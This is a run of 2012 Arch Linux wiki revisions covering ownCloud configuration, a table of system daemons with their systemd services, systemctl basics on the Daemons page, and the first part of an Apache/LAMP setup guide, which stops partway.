gd.so<br />
xmlrpc.so<br />
zip.so<br />
iconv.so<br />
Depending on which database backend you are going to use uncomment either one of the following extensions in '''/etc/php/php.ini'''<br />
sqlite.so<br />
sqlite3.so<br />
pdo_sqlite.so<br />
OR<br />
mysql.so<br />
mysqli.so<br />
pdo_mysql.so<br />
now [[Daemons#Restarting|restart]] httpd (Apache)<br />
and open [http://localhost http://localhost] in your browser. You should now be able to create a user account and follow the installation wizard.<br />
<br />
== Custom configurations ==<br />
<br />
=== Filesize Limitations ===<br />
With the default configuration ownCloud only allows the upload of filesizes less than 2MB.<br />
This can be changed by changing the following line in '''/etc/php/php.ini''' to your liking.<br />
<br />
'''As of version 4.0 this is no longer necessary! The maximum upload size is now set via the ownCloud gui'''<br />
upload_max_filesize = 2M<br />
<br />
As of version 4.5, upload limits are set in '''/usr/share/webapps/owncloud/.htaccess'''. This won't work if [[LAMP#Using_php5_with_apache2-mpm-worker_and_mod_fcgid|PHP is set up to run as CGI]], so you need to change the limits in '''/etc/php/php.ini'''. You also need to change open_basedir.<br />
upload_max_filesize = 512M<br />
post_max_size = 512M<br />
memory_limit = 512M<br />
open_basedir = /srv/http/:/home/:/tmp/:/usr/share/pear/:/usr/share/webapps/<br />
<br />
=== Running owncloud in a subdirectory ===<br />
<br />
By including the default '''owncloud.conf''' in '''httpd.conf''', owncloud will take control of port 80 and your localhost domain. If you would like to have owncloud run in a subdirectory, then skip the 'Include /etc/httpd/conf/extra/owncloud.conf' line altogether and just use a symbolic link like so: <br />
ln -s /usr/share/webapps/owncloud/ /srv/http/<br />
<br />
== Filling ownCloud with data ==<br />
=== Small Files ===<br />
Always use [[WebDAV]] or the web interface to add new files to your ownCloud. Otherwise they will not show up correctly, as they do not get indexed right.<br />
<br />
Consider installing and enabling php-apc to speed up WebDAV.<br />
<br />
When using [[SABnzbd]], you might want to set<br />
folder_rename 0<br />
in your sabnzbd.ini file, because ownCloud will scan the files as soon as they get uploaded, preventing SABnzbd from removing UNPACKING prefixes etc.<br />
<br />
=== Big Files ===<br />
WebDAV isn't suitable for big files, because it fills up all the RAM and CPU.<br />
<br />
With the current version, it looks like, there is no good way of copying huge amounts of data to your ownCloud.<br />
<br />
<br />
Here's a Workaround:<br />
<br />
copy the files directly to your ownCloud and do a full re-scan of your database (you could use the [http://apps.owncloud.com/content/show.php?content=151948&forumpage=0&PHPSESSID=37b915160effcc0f37cc761ad2ab88be Re-scan filesystem] add-on for example).<br />
<br />
<br />
But beware that this will not work as easily in the future, when end-to-end encryption gets added to ownCloud (this is a planned feature).<br />
<br />
== Important Notes ==<br />
* When using a subdomain (like cloud.example.xxx), make sure it is covered by your certificate. Otherwise, connection via the owncloud client or webdav might fail.<br />
<br />
* If you are planning on using OwnCloud's [http://owncloud.org/sync-clients/ sync-clients], make sure to have [[Network_Time_Protocol_daemon|NTP]] installed and running on your OwnCloud server, otherwise the sync-clients will fail.<br />
<br />
* Add some [[LAMP#SSL|SSL encryption]] to your connection!<br />
<br />
== Nginx + uwsgi_php alternative ==<br />
<br />
You can avoid the use of Apache, and run owncloud in it's own process by using the [https://aur.archlinux.org/packages.php?ID=63798 wsgi_php] application server. uWSGI itself has a wealth of features to limit the resource use, and to harden the security of the application, and by being a separate process it can run under its own user.<br />
<br />
The nginx config is:<br />
#this is to avoid Request Entity Too Large error<br />
client_max_body_size 1000M;<br />
# deny access to some special files<br />
location ~ ^/(data|config|\.ht|db_structure\.xml|README) {<br />
deny all;<br />
}<br />
# pass all .php or .php/path urls to uWSGI<br />
location ~ ^(.+\.php)(.*)$ {<br />
include uwsgi_params;<br />
uwsgi_modifier1 14;<br />
uwsgi_pass 127.0.0.1:3001;<br />
}<br />
# everything else goes to the filesystem,<br />
# but / will be mapped to index.php and run through uwsgi<br />
location / {<br />
root /usr/share/webapps/owncloud;<br />
index index.php;<br />
}<br />
<br />
The uWSGI /etc/uwsgi/owncloud.ini config file (run it with uwsgi_php --ini /etc/uwsgi/owncloud.ini):<br />
[uwsgi]<br />
socket = 127.0.0.1:3001<br />
master = true<br />
chdir = /srv/http/owncloud<br />
php-docroot = /usr/share/webapps/owncloud<br />
php-index = index.php<br />
# only allow these php files, I don't want to inadvertently run something else<br />
php-allowed-ext = /index.php<br />
php-allowed-ext = /remote.php<br />
php-allowed-ext = /cron.php<br />
php-allowed-ext = /status.php<br />
php-allowed-ext = /settings/apps.php<br />
php-allowed-ext = /core/ajax/share.php<br />
php-allowed-ext = /core/ajax/requesttoken.php<br />
php-allowed-ext = /core/ajax/translations.php<br />
php-set = date.timezone=Europe/Skopje<br />
php-set = open_basedir=/srv/http/owncloud:/tmp/:/usr/share/pear/:/usr/share/webapps/owncloud<br />
processes = 10<br />
cheaper = 2<br />
<br />
Finally, a simple systemd unit file to start the uwsgi instance can be (this is without using the emperor):<br />
[Unit]<br />
Description=OwnCloud service via uWSGI-PHP<br />
[Service]<br />
User=http<br />
ExecStart=/usr/bin/uwsgi_php --ini /etc/uwsgi/owncloud.ini<br />
ExecReload=/bin/kill -HUP $MAINPID<br />
KillSignal=SIGQUIT<br />
Restart=always<br />
[Install]<br />
WantedBy=multi-user.target</div>Wakehttps://wiki.archlinux.org/index.php?title=Daemons_list&diff=234754Daemons list2012-11-10T21:38:32Z<p>Wake: alphabetize correctly</p>
<hr />
<div>[[Category:Boot process]]<br />
[[Category:Daemons and system services]]<br />
[[zh-cn:Daemons List]]<br />
Here is a list of daemons. Note that any package can provide a daemon, so this list will never be complete. Please feel free to add any missing daemons here, in alphabetical order.<br />
For each daemon the name of the script (for [[rc.conf|initscripts]]) and of the service (for [[systemd]]) is given.<br />
{| border="1"<br />
!initscripts!!systemd!!Description<br />
|-<br />
|[[acpid]]||acpid.service||Delivers ACPI events.<br />
|-<br />
|[[Advanced Linux Sound Architecture|alsa]]||alsa-store.service<br />
alsa-restore.service<br />
||Advanced Linux Sound Architecture; provides device drivers for sound cards.<br />
|-<br />
|atd||atd.service||Run jobs queued for later execution.<br />
|-<br />
|[[Avahi|avahi-daemon]]||avahi-daemon.service||Allows programs to automatically find local network services.<br />
|-<br />
|[[Avahi|avahi-dnsconfd]]||avahi-dnsconfd.service||<br />
|-<br />
|[[Bitlbee|bitlbee]]||bitlbee.service||BitlBee IRC/IM gateway.<br />
|-<br />
|[[Chrony|chrony]]||chrony.service||Alternative NTP client/server designed for systems not online all the time.<br />
|-<br />
|[[ClamAV|clamav]]||clamd.service<br />
freshclamd.service<br />
||Antivirus.<br />
|-<br />
|[[CPU_Frequency_Scaling|cpupower]]||cpupower.service||Userspace tools for the kernel cpufreq subsystem<br />
|-<br />
|craftbukkit||''not yet implemented''||CraftBukkit Minecraft server<br />
|-<br />
|[[Cron|crond]]||cronie.service||Daemon to schedule and time events. The daemon name ''crond'' is used by at least two packages, {{Pkg|cronie}} and {{Pkg|dcron}}.<br />
|-<br />
|[[CUPS|cupsd]]||cupsd.service<br />
''or'' cups.service<br />
||Common UNIX Printing System daemon.<br />
|-<br />
|[[D-Bus|dbus]]||dbus.service||Message bus system for software communication.<br />
|-<br />
|[[Cron|dcron]]||dcron.service||Daemon to schedule and time events. The daemon name ''crond'' is used by at least two packages, {{Pkg|cronie}} and {{Pkg|dcron}}. {{Pkg|cronie}} is the default cron implementation for Arch.<br />
|-<br />
|[[dante|sockd]]||sockd.service||A circuit-level SOCKS client/server.<br />
|-<br />
|[[Deluge|deluged]]||deluged.service||Cross-platform and full-featured BitTorrent client.<br />
|-<br />
|[[Deluge|deluge-web]]||deluge-web.service||Cross-platform and full-featured BitTorrent client web UI.<br />
|-<br />
|[[Dhcpcd|dhcpcd]]||dhcpcd@.service||DHCP daemon. Insert the network interface after @ ('dhcpcd@eth0.service'). <br />
|-<br />
|[[Dovecot|dovecot]]||dovecot.service||IMAP and POP3 server. <br />
|-<br />
|[[Dropbox|dropboxd]]||''not yet implemented''||Cross-platform file synchronisation with version control.<br />
|-<br />
|[[FAM|fam]]||''deprecated''||File Alteration Monitor. (deprecated)<br />
|-<br />
|fancontrol||fancontrol.service||Fan control daemon (part of lm_sensors)<br />
|-<br />
|[[Fbsplash|fbsplash]]||''not yet implemented''||Graphical boot splash screen for the user.<br />
|-<br />
|[[FluidSynth|fluidsynth]]||fluidsynth.service||Software synthesizer<br />
|-<br />
|ftpd||''not yet implemented''||Inetutils ftp daemon<br />
|-<br />
|[[GDM|gdm]]||gdm.service||Gnome Display Manager (Login Screen)<br />
|-<br />
|[[Git|git-daemon]]||git-daemon.socket||GIT daemon<br />
|-<br />
|[[Console Mouse Support|gpm]]||gpm.service||Console mouse support.<br />
|-<br />
|[[HAL|hal]]||''deprecated''||Hardware Abstraction Layer. (Deprecated)<br />
|-<br />
|hddtemp||hddtemp.service||Hard drive temperature monitor daemon<br />
|-<br />
|healthd||healthd.service||A daemon which can be used to alert you in the event of a hardware health monitoring alarm (part of lm_sensors).<br />
|-<br />
|-<br />
|[[LAMP|httpd]]||httpd.service<br />
See [[Systemd/Services#apache2]] for manual configuration.<br />
||Apache HTTP Server (Web Server)<br />
|-<br />
|[[hwclock]]||||Not a daemon as such, but on shutdown, updates hwclock to compensate for drift. Only run this daemon if ntpd is not running as both daemons adjust the hardware clock.<br />
|-<br />
|iptables||iptables.service||Load firewall rules.<br />
|-<br />
|-<br />
|ip6tables||ip6tables.service||Load firewall rules for ipv6.<br />
|-<br />
|irqbalance||irqbalance.service||Irqbalance is the Linux utility tasked with making sure that interrupts from your hardware devices are handled in as efficient a manner as possible.<br />
|-<br />
|[[KDE|kdm]]||kdm.service||KDE Display Manager (Graphical Login)<br />
|-<br />
|krb5-kadmind||krb5-kadmind.service||Kerberos 5 administration server<br />
|-<br />
|krb5-kdc||krb5-kdc.service||Kerberos 5 KDC<br />
|-<br />
|krb5-kpropd||krb5-kpropd.service||Kerberos 5 propagation server<br />
|-<br />
|[[Laptop Mode Tools|laptop-mode]]||laptop-mode.service||Laptop Power Saving Tools<br />
|-<br />
|[[lighttpd]]||lighttpd.service||Lighttpd HTTP Server (Web Server).<br />
|-<br />
|[[LXDE|lxdm]]||lxdm.service||LXDE Display Manager (Graphical Login)<br />
|-<br />
|mdadm||mdadm.service||MD Administration (Linux Software RAID).<br />
|-<br />
|[[miniDLNA]]||minidlna.service||simple DLNA/UPnP media server<br />
|-<br />
|[[Music Player Daemon|mpd]]||mpd.service||Music Player Daemon.<br />
|-<br />
|[[MySQL|mysqld]]||mysqld.service||MySQL database server.<br />
|-<br />
|[[MythTV|mythbackend]]||mythbackend.service||Backend for the MythTV digital video recording/home theater software.<br />
|-<br />
|[[BIND|named]]||named.service||The Berkeley Internet Name Daemon (BIND) DNS server.<br />
|-<br />
|netfs||''unused, handled automatically, see''<br />
remote-fs.target<br />
''to manually execute scripts''<br />
||Mounts network file systems.<br />
|-<br />
|[[Netcfg|net-auto-wired]]||net-auto-wired.service||Netcfg replacement for {{ic|network}} - connects to wired network<br />
|-<br />
|[[Netcfg|net-auto-wireless]]||net-auto-wireless.service||Netcfg replacement for {{ic|network}} - connects to wireless network<br />
|-<br />
|[[Netcfg|net-profiles]]||netcfg.service<br />
netcfg@<profile-name>.service<br />
||Netcfg replacement for {{ic|network}} - connects to profiles<br />
|-<br />
|[[Configuring_Network|network]]||''(dynamic Ethernet)'' dhcpcd@<interface>.service||To bring up the network connections.<br />
|-<br />
|[[NetworkManager|networkmanager]]||NetworkManager.service<br />
NetworkManager-wait-online.service<br />
||Replaces {{ic|network}}, and provides configuration and detection for automatic network connections.<br />
|-<br />
|[[Nginx|nginx]]||nginx.service||Nginx HTTP Server and IMAP/POP3 proxy server (Web Server)<br />
|-<br />
|nscd||nscd.service||Name service cache daemon<br />
|-<br />
|[[Network Time Protocol daemon|ntpd]]||ntpd.service||Network Time Protocol daemon (client and server).<br />
|-<br />
|[[Ntop|Ntop]]||ntop.service||Ntop is a network traffic probe based on libcap.<br />
|-<br />
|[[OpenNTPD|openntpd]]||openntpd.service||alternate Network Time Protocol daemon (client and server).<br />
|-<br />
|osspd||osspd.service||OSS Userspace Bridge.<br />
|-<br />
|[[OpenVPN|openvpn]]||openvpn@<profile-name>.service||One for each vpn conf file saved like /etc/openvpn/<profile-name>.conf<br />
|-<br />
|[[Pdnsd|pdnsd]]||pdnsd.service||Proxy DNS server with permanent caching.<br />
|-<br />
|[[Nginx#1st_Method_.22New.22_.28as_of_PHP_5.3.3.29|php-fpm]]||php-fpm.service||FastCGI Process Manager for PHP<br />
|-<br />
|[[OSS|oss]]||oss.service||Open Sound System. Alternative to ALSA.<br />
|-<br />
|[[PostgreSQL|postgresql]]||postgresql.service||PostgreSQL database server.<br />
|-<br />
|[[Postfix|postfix]]||postfix.service||<br />
|-<br />
|[[powernowd]]||''not yet implemented''||To adjust speed of CPU depending on system load. See also [[CPU Frequency Scaling]]<br />
|-<br />
|[[PPTP Server|pptpd]]||pptpd.service||A Virtual Private Network (VPN) server using the Point-to-Point Tunneling Protocol (PPTP).<br />
|-<br />
|[[Prosody|prosody]]||prosody.service||XMPP server.<br />
|-<br />
|[[pppd|Pppd]]||ppp@provider.service||A daemon which implements the Point-to-Point Protocol for dial-up networking.<br />
|-<br />
|[[preload]]||preload.service||Makes applications run faster by prefetching binaries and shared objects.<br />
|-<br />
|[[psd]]||psd.service||Manages your browser's profile in tmpfs and periodically sync it back to your physical disk.<br />
|-<br />
|pure-ftpd||''not yet implemented''||FTP server.<br />
|-<br />
|[[readahead]]||systemd-readahead-collect.service<br />
systemd-readahead-done.service<br />
<br />
systemd-readahead-drop.service<br />
<br />
systemd-readahead-replay.service<br />
||Readahead for faster boot<br />
|-<br />
||rfkill||rfkill.service||(Un)block radio devices. (.service does not seem to provide equivalent functionality.)<br />
|-<br />
|[[Rsync|rsyncd]]||rsyncd.service||Rsync daemon.<br />
|-<br />
|[[Rsyslog|rsyslogd]]||rsyslog.service||The latest version of a system logger.<br />
|-<br />
|[[samba]]||smbd.service<br />
nmbd.service<br />
<br />
winbindd.service<br />
||File and print services for Microsoft Windows clients.<br />
|-<br />
|[[USB_Scanner_Support|saned]]||saned@.service||To share the scanner system over network.<br />
|-<br />
|sensord||sensord.service||Sensor information logging daemon (part of lm_sensors)<br />
|-<br />
|[[Lm sensors|sensors]]||lm_sensors.service||Hardware (temperature, fans etc) monitoring.<br />
|-<br />
|[[SLiM|slim]]||slim.service||Simple Login Manager<br />
|-<br />
|[[SMART|smartd]]||smartd.service||Self-Monitoring, Analysis, and Reporting Technology (S.M.A.R.T) Hard Disk Monitoring<br />
|-<br />
|[[Samba#smbnetfs|smbnetfs]]||smbnetfs.service||To automatically mount Samba/Microsoft network shares.<br />
|-<br />
|snmpd||''not yet implemented''||A suite of applications used to implement SNMP<br />
|-<br />
|soundmodem||''not yet implemented''||Multiplatform Soundcard Packet Radio Modem<br />
|-<br />
|[[SOHO Postfix|spamd]]||spamassassin.service|| e-mail spam filtering service.<br />
|-<br />
|[[Secure Shell|sshd]]||sshd.service<br />
sshd@.service<br />
<br />
sshdgenkeys.service<br />
||OpenSSH (secure shell) daemon.<br />
|-<br />
|stbd||''deprecated''||This daemon was previously necessary for gnome-system-tools. However, as of gnome-tools 2.28, it is no longer needed.<br />
|-<br />
|[[stunnel]]||stunnel.service||Allows encrypting arbitrary TCP connections inside SSL.<br />
|-<br />
|svnserve||svnserve.service||Subversion server<br />
|-<br />
|syslogd||''deprecated''||This was the older and basic system logger.<br />
|-<br />
|[[syslog-ng]]||syslog-ng.service||System logger next generation.<br />
|-<br />
|[[Timidity|timidity++]]||''not yet implemented''||Software synthesizer for MIDI.<br />
|-<br />
|[[Tor|tor]]||tor.service||Onion routing for anonymous communication.<br />
|-<br />
|[[Transmission|transmissiond]]||transmission.service||Bit Torrent Daemon.<br />
|-<br />
|[[Ufw|ufw]]||ufw.service||Uncomplicated FireWall.<br />
|-<br />
|[[VirtualBox|vboxservice]]||vboxservice.service||VirtualBox Guest Service<br />
|-<br />
|[[Very Secure FTP Daemon|vsftpd]]||vsftpd.service<br />
vsftpd@.service<br />
<br />
vsftpd-ssl.service<br />
||FTP server.<br />
|-<br />
|[[wicd]]||wicd.service||Combine with dbus to replace {{ic|network}}, a lightweight alternative to NetworkManager.<br />
|-<br />
|[[x11vnc]]||''not yet implemented''||VNC remote desktop daemon <br />
|-<br />
|}</div>Wakehttps://wiki.archlinux.org/index.php?title=Daemons&diff=234753Daemons2012-11-10T21:36:41Z<p>Wake: </p>
<hr />
<div>[[Category:Boot process]]<br />
[[Category:Daemons and system services]]<br />
[[cs:Daemon]]<br />
[[de:Daemons]]<br />
[[it:Daemon]]<br />
[[pl:Daemon]]<br />
[[ro:Daemon]]<br />
[[ru:Daemon]]<br />
[[tr:Artsüreç]]<br />
[[zh-CN:Daemon]]<br />
A [[Wikipedia:Daemon (computing)|daemon]] is a program that runs in the background, waiting for events to occur and offering services. A good example is a web server that waits for a request to deliver a page or a ssh server waiting for someone trying to log in. While these are full featured applications, there are daemons whose work is not that visible. Daemons are for tasks like writing messages into a log file (e.g. {{ic|syslog}}, {{ic|metalog}}) or keeping your system time accurate (e.g. [[Network Time Protocol daemon|{{ic|ntpd}}]]). For more information see {{ic|man 7 daemon}}.<br />
<br />
{{Note|The word daemon is sometimes used for a class of programs that are started at boot but have no process which remains in memory. They are called daemons simply because they utilize the same startup/shutdown framework (e.g. systemd service files of Type oneshot) used to start traditional daemons. For example, the service files for {{ic|alsa-store}} and {{ic|alsa-restore}} provide persistent configuration support but do not start additional background processes to service requests or respond to events.<br />
<br />
From the user's perspective the distinction is typically not significant unless the user tries to look for the "daemon" in a process list.<br />
}}<br />
<br />
==Managing daemons==<br />
In Arch Linux, daemons are handled by [[systemd]]. The ''systemctl'' command is used to control them.<br />
<br />
===Starting on boot===<br />
A default install of Arch Linux will leave you with very few services (or daemons) enabled during boot. You can add or remove services to be started on boot by calling<br />
<br />
# systemctl enable <name><br />
<br />
or<br />
<br />
# systemctl disable <name><br />
<br />
The services themselves contain the necessary ordering information, so there is no need to order them manually.<br />
<br />
Service files are stored in {{ic|/{etc,usr/lib,run}/systemd/system}}. You can print the list of all the available services on your system, along with their current status, with:<br />
$ systemctl list-unit-files<br />
<br />
To see a list of running units (some of which will be daemons, among other things), type:<br />
$ systemctl list-units<br />
<br />
To see all available ones, add {{ic| --all}} to the end of a command.<br />
<br />
===Starting manually===<br />
To start or stop services at runtime, use {{ic|systemctl start<nowiki>|</nowiki>stop ''<service>''}}.<br />
<br />
===Restarting===<br />
To restart services, use {{ic|systemctl restart ''<service>''}}.<br />
<br />
==List of daemons==<br />
See [[Daemons List]] for a list of daemons with the name of the service and legacy rc.d script.<br />
<br />
==See also==<br />
* [[Systemd|systemd]]<br />
* Examples for writing [[Systemd/Services]]</div>Wakehttps://wiki.archlinux.org/index.php?title=Daemons&diff=234750Daemons2012-11-10T21:21:12Z<p>Wake: /* Starting manually */ fix the anchor.</p>
<hr />
<div>[[Category:Boot process]]<br />
[[Category:Daemons and system services]]<br />
[[cs:Daemon]]<br />
[[de:Daemons]]<br />
[[it:Daemon]]<br />
[[pl:Daemon]]<br />
[[ro:Daemon]]<br />
[[ru:Daemon]]<br />
[[tr:Artsüreç]]<br />
[[zh-CN:Daemon]]<br />
A [[Wikipedia:Daemon (computing)|daemon]] is a program that runs in the background, waiting for events to occur and offering services. A good example is a web server that waits for a request to deliver a page or a ssh server waiting for someone trying to log in. While these are full featured applications, there are daemons whose work is not that visible. Daemons are for tasks like writing messages into a log file (e.g. {{ic|syslog}}, {{ic|metalog}}) or keeping your system time accurate (e.g. [[Network Time Protocol daemon|{{ic|ntpd}}]]). For more information see {{ic|man 7 daemon}}.<br />
<br />
{{Note|The word daemon is sometimes used for a class of programs that are started at boot but have no process which remains in memory. They are called daemons simply because they utilize the same startup/shutdown framework (e.g. systemd service files of Type oneshot) used to start traditional daemons. For example, the service files for {{ic|alsa-store}} and {{ic|alsa-restore}} provide persistent configuration support but do not start additional background processes to service requests or respond to events.<br />
<br />
From the user's perspective the distinction is typically not significant unless the user tries to look for the "daemon" in a process list.<br />
}}<br />
<br />
==Managing daemons==<br />
In Arch Linux, daemons are handled by [[systemd]]. The ''systemctl'' command is used to control them.<br />
<br />
===Starting on boot===<br />
A default install of Arch Linux will leave you with very few services (or daemons) enabled during boot. You can add or remove services to be started on boot by calling<br />
<br />
# systemctl enable <name><br />
<br />
or<br />
<br />
# systemctl disable <name><br />
<br />
The services themselves contain the necessary ordering information, so there is no need to order them manually.<br />
<br />
Service files are stored in {{ic|/{etc,usr/lib,run}/systemd/system}}. You can print the list of all the available services on your system, along with their current status, with:<br />
$ systemctl list-unit-files<br />
<br />
To see a list of running units (some of which will be daemons, among other things), type:<br />
$ systemctl list-units<br />
<br />
To see all available ones, add {{ic| --all}} to the end of a command.<br />
<br />
===Starting manually===<br />
To start or stop services at runtime, you can replace {{ic|enable}}/{{ic|disable}} with {{ic|start}}/{{ic|stop}} in the above command.<br />
<br />
You can read more at the [[Systemd#Using_units]] section.<br />
<br />
==List of daemons==<br />
See [[Daemons List]] for a list of daemons with the name of the service and legacy rc.d script.<br />
<br />
==See also==<br />
* [[Systemd|systemd]]<br />
* Examples for writing [[Systemd/Services]]</div>Wakehttps://wiki.archlinux.org/index.php?title=Apache_HTTP_Server&diff=234748Apache HTTP Server2012-11-10T21:17:15Z<p>Wake: /* MySQL */ rm rc.d stuff</p>
<hr />
<div>[[Category:Web Server]]<br />
[[cs:LAMP]]<br />
[[de:LAMP Installation]]<br />
[[el:LAMP]]<br />
[[es:LAMP]]<br />
[[fr:Lamp]]<br />
[[it:LAMP]]<br />
[[pl:LAMP]]<br />
[[ru:LAMP]]<br />
[[sr:LAMP]]<br />
[[tr:LAMP]]<br />
[[zh-CN:LAMP]]<br />
[http://en.wikipedia.org/wiki/LAMP_%28software_bundle%29 LAMP] refers to a common combination of software used in many web servers: '''L'''inux, '''A'''pache, '''M'''ySQL, and '''P'''HP. This article describes how to set up the [http://httpd.apache.org Apache HTTP Server] on an Arch Linux system. It also tells you how to optionally install [[PHP]] and [[MySQL]] and integrate these in the Apache server.<br />
<br />
If you only need a web server for development and testing, [[Xampp]] might be a better and easier option.<br />
<br />
==Installation==<br />
# pacman -S apache php php-apache mysql<br />
<br />
This document assumes you will install Apache, PHP and MySQL together. If desired however, you may install Apache, PHP, and MySQL separately and simply refer to the relevant sections below.<br />
<br />
{{Note|New default user and group: Instead of group "nobody", apache now runs as user/group "http" by default. You might want to adjust your httpd.conf according to this change, though you may still run httpd as nobody.}}<br />
<br />
==Configuration==<br />
<br />
===Apache===<br />
For security reasons, as soon as Apache is started by the root user (directly or via startup scripts) it switches to the UID/GID specified in {{ic|/etc/httpd/conf/httpd.conf}}<br />
<br />
* Check for the existence of the http user by looking for ''http'' in the output of the following command:<br />
# grep http /etc/passwd<br />
<br />
* Create the system user http if it does not exist already:<br />
# useradd -d /srv/http -r -s /bin/false -U http<br />
:This creates the http user with home directory {{ic|/srv/http/}}, as a system account (-r), with a bogus shell (-s {{ic|/bin/false}}) and creates a group with the same name (-U).<br />
<br />
* Add this line to {{ic|/etc/hosts}} (If the file does not exist, create it.):<br />
127.0.0.1 localhost.localdomain localhost<br />
:If you want a different hostname, append it to the end:<br />
127.0.0.1 localhost.localdomain localhost myhostname<br />
<br />
* Make sure the hostname appears in /etc/hosts or apache will fail to start. Alternatively, you can<br />
edit {{ic|/etc/httpd/conf/httpd.conf}} and comment the following module:<br />
LoadModule unique_id_module modules/mod_unique_id.so<br />
<br />
* Customize your config. At least change {{ic|httpd.conf}} and {{ic|extra/httpd-default.conf}} to your liking. For security reasons, you might want to change '''ServerTokens Full''' to '''ServerTokens Prod''' and '''ServerSignature On''' to '''ServerSignature Off''' in {{ic|extra/httpd-default.conf}}.<br />
<br />
* Start the HTTP server (the deamon name is '''httpd'''. See [[Daemons#Starting_manually|Deamons]]).<br />
<br />
:Apache should now be running. Test by visiting http://localhost/ in a web browser. It should display a simple Apache test page. If you receive a 403 Error, comment out the following line in {{ic|/etc/httpd/conf/httpd.conf}}:<br />
Include conf/extra/httpd-userdir.conf<br />
<br />
* To start '''httpd''' automatically at boot, see [[Daemons#Starting_on_boot|Deamons]]<br />
<br />
====User dirs====<br />
* If you do not want user directories to be available on the web (e.g., {{ic|~/public_html}} on the machine is accessed as http://localhost/~user/ -Note that you can change what this points to in {{ic|/etc/httpd/conf/extra/httpd-userdir.conf}}), comment the following line in {{ic|/etc/httpd/conf/httpd.conf}} since they are activated by default:<br />
Include conf/extra/httpd-userdir.conf<br />
<br />
* You must make sure that your home directory permissions are set properly so that Apache can get there. Your home directory and {{ic|~/public_html/}} must be executable for others ("rest of the world"). This seems to be enough:<br />
$ chmod o+x ~<br />
$ chmod o+x ~/public_html<br />
<br />
* More secure way to share your home folder with apache is to add '''http user''' in group that your home folder belongs. For example, if your home folder and other sub-folders in your home folder belong to group '''piter''', all you have to do is following:<br />
<br />
$ usermod -aG piter http<br />
<br />
* Of course, you have to give ''read'' and ''execute'' permissions on {{ic|~/}}, {{ic|~/public_html}}, and all other sub-folders in {{ic|~/public_html}} to the group members (group '''piter''' in our case). Do something like following ('''modify commands for your specific case'''):<br />
<br />
$ chmod g+xr-w /home/''yourusername''<br />
$ chmod -R g+xr-w /home/''yourusername''/public_html<br />
<br />
{{Note|This way you do not have to give access to your folder to every single user in order to give access to '''http user'''. Only '''http user''' and other potential users that are in '''piter''' group will have access to your home folder.}}<br />
<br />
and restart '''httpd'''.<br />
<br />
====SSL====<br />
Create self-signed certificate (you can change key size and days of validity)<br />
# cd /etc/httpd/conf<br />
# openssl genrsa -des3 -out server.key 1024<br />
# openssl req -new -key server.key -out server.csr<br />
# cp server.key server.key.org<br />
# openssl rsa -in server.key.org -out server.key<br />
# openssl x509 -req -days 365 -in server.csr -signkey server.key -out server.crt<br />
In {{ic|/etc/httpd/conf/httpd.conf}} uncomment line<br />
Include conf/extra/httpd-ssl.conf<br />
and restart '''httpd'''.<br />
<br />
====Virtual Hosts====<br />
If you want to have more than one host, make sure you have<br />
{{bc|<br />
# Virtual hosts<br />
Include conf/extra/httpd-vhosts.conf<br />
}}<br />
in {{ic|/etc/httpd/conf/httpd.conf}}.<br />
<br />
In {{ic|/etc/httpd/conf/extra/httpd-vhosts.conf}} set your virtual hosts according the example, e.g.:<br />
{{bc|<br />
NameVirtualHost *:80<br />
<br />
#this first virtualhost enables: http://127.0.0.1, or: http://localhost, <br />
#to still go to /srv/http/*index.html(otherwise it will 404_error).<br />
#the reason for this: once you tell httpd.conf to include extra/httpd-vhosts.conf, <br />
#ALL vhosts are handled in httpd-vhosts.conf(including the default one),<br />
# E.G. the default virtualhost in httpd.conf is not used and must be included here, <br />
#otherwise, only domainname1.dom & domainname2.dom will be accessible<br />
#from your web browser and NOT http://127.0.0.1, or: http://localhost, etc.<br />
#<br />
<br />
<VirtualHost *:80><br />
DocumentRoot "/srv/http"<br />
ServerAdmin root@localhost<br />
ErrorLog "/var/log/httpd/127.0.0.1-error_log"<br />
CustomLog "/var/log/httpd/127.0.0.1-access_log" common<br />
<Directory /srv/http/><br />
DirectoryIndex index.htm index.html<br />
AddHandler cgi-script .cgi .pl<br />
Options ExecCGI Indexes FollowSymLinks MultiViews +Includes<br />
AllowOverride None<br />
Order allow,deny<br />
allow from all<br />
</Directory><br />
</VirtualHost><br />
<br />
<br />
<VirtualHost *:80><br />
ServerAdmin your@domainname1.dom<br />
DocumentRoot "/home/username/yoursites/domainname1.dom/www"<br />
ServerName domainname1.dom<br />
ServerAlias domainname1.dom<br />
<Directory /home/username/yoursites/domainname1.dom/www/><br />
DirectoryIndex index.htm index.html<br />
AddHandler cgi-script .cgi .pl<br />
Options ExecCGI Indexes FollowSymLinks MultiViews +Includes<br />
AllowOverride None<br />
Order allow,deny<br />
allow from all<br />
</Directory><br />
</VirtualHost><br />
<br />
<VirtualHost *:80><br />
ServerAdmin your@domainname2.dom<br />
DocumentRoot "/home/username/yoursites/domainname2.dom/www"<br />
ServerName domainname2.dom<br />
ServerAlias domainname2.dom<br />
<Directory /home/username/yoursites/domainname2.dom/www/><br />
DirectoryIndex index.htm index.html<br />
AddHandler cgi-script .cgi .pl<br />
Options ExecCGI Indexes FollowSymLinks MultiViews +Includes<br />
AllowOverride None<br />
Order allow,deny<br />
allow from all<br />
</Directory><br />
</VirtualHost><br />
}}<br />
<br />
Add your virtual host names to your {{ic|/etc/hosts}} file (NOT necessary if bind is serving these domains already, but will not hurt):<br />
{{bc|127.0.0.1 domainname1.dom<br />
127.0.0.1 domainname2.dom}}<br />
<br />
and restart '''httpd'''.<br />
<br />
If you setup your virtual hosts to be in your user directory, sometimes it interferes with Apache's 'Userdir' settings. To avoid problems disable 'Userdir' by commenting it out:<br />
{{bc|<br />
# User home directories<br />
#Include conf/extra/httpd-userdir.conf}}<br />
<br />
As said above, ensure that you have the proper permissions:<br />
# chmod 0775 /home/yourusername/<br />
<br />
If you have a huge amount of virtual hosts you easily want to dis- and enable, it's recommended to create one config file per virtualhost and store them all in one folder, eg: {{ic|/etc/httpd/conf/vhosts}}.<br />
<br />
First create the folder:<br />
# mkdir /etc/httpd/conf/vhosts<br />
<br />
Then place the single config files in them:<br />
# nano /etc/httpd/conf/vhosts/domainname1.dom<br />
# nano /etc/httpd/conf/vhosts/domainname2.dom<br />
...<br />
<br />
In the last step, "Include" the single configs in your {{ic|/etc/httpd/conf/httpd.conf}}:<br />
{{bc|#Enabled Vhosts:<br />
Include conf/vhosts/domainname1.dom<br />
#Include conf/vhosts/domainname1.dom}}<br />
<br />
You can enable and disable single virtual hosts by commenting them out or uncommenting them.<br />
<br />
====Advanced Options====<br />
These options in {{ic|/etc/httpd/conf/httpd.conf}} might be interesting for you:<br />
<br />
